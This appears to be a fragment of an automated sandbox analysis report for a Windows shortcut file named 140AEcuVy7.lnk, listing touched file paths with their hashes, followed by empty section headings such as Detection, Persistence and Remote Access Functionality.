C:\Users\user\AppData\Roaming\Adobe\Acrobat\DC\Security\addressbook.acrodata	ISO-8859 text, with very long lines (3486), with CRLF, CR line terminators	32FCA302C8B872738373D7CCB1E75FD4	DA85FAF24ED0ECFD5D69CCFD6286D8B77D7EB4F1	CD0DD26304B88C20801FE80B33C49C009E2E5D4411B5D7F83252E1D90CD461C6
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15d362c86149b66f.customDestinations-ms (copy)	data	BB1FF3DE74731B4D526B0F87824B2C55	F11DDC9B04DF2CD7F09EA84B145E0DC207FC0CE9	5075EF4653ECD0DDA1CEC7F176293F48B076F521080824BF2D0971B646C9FFFA
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7046Q27TCX0LY0SIK7MW.temp	data	BB1FF3DE74731B4D526B0F87824B2C55	F11DDC9B04DF2CD7F09EA84B145E0DC207FC0CE9	5075EF4653ECD0DDA1CEC7F176293F48B076F521080824BF2D0971B646C9FFFA
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9

Windows Analysis Report 140AEcuVy7.lnk

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
140AEcuVy7.lnk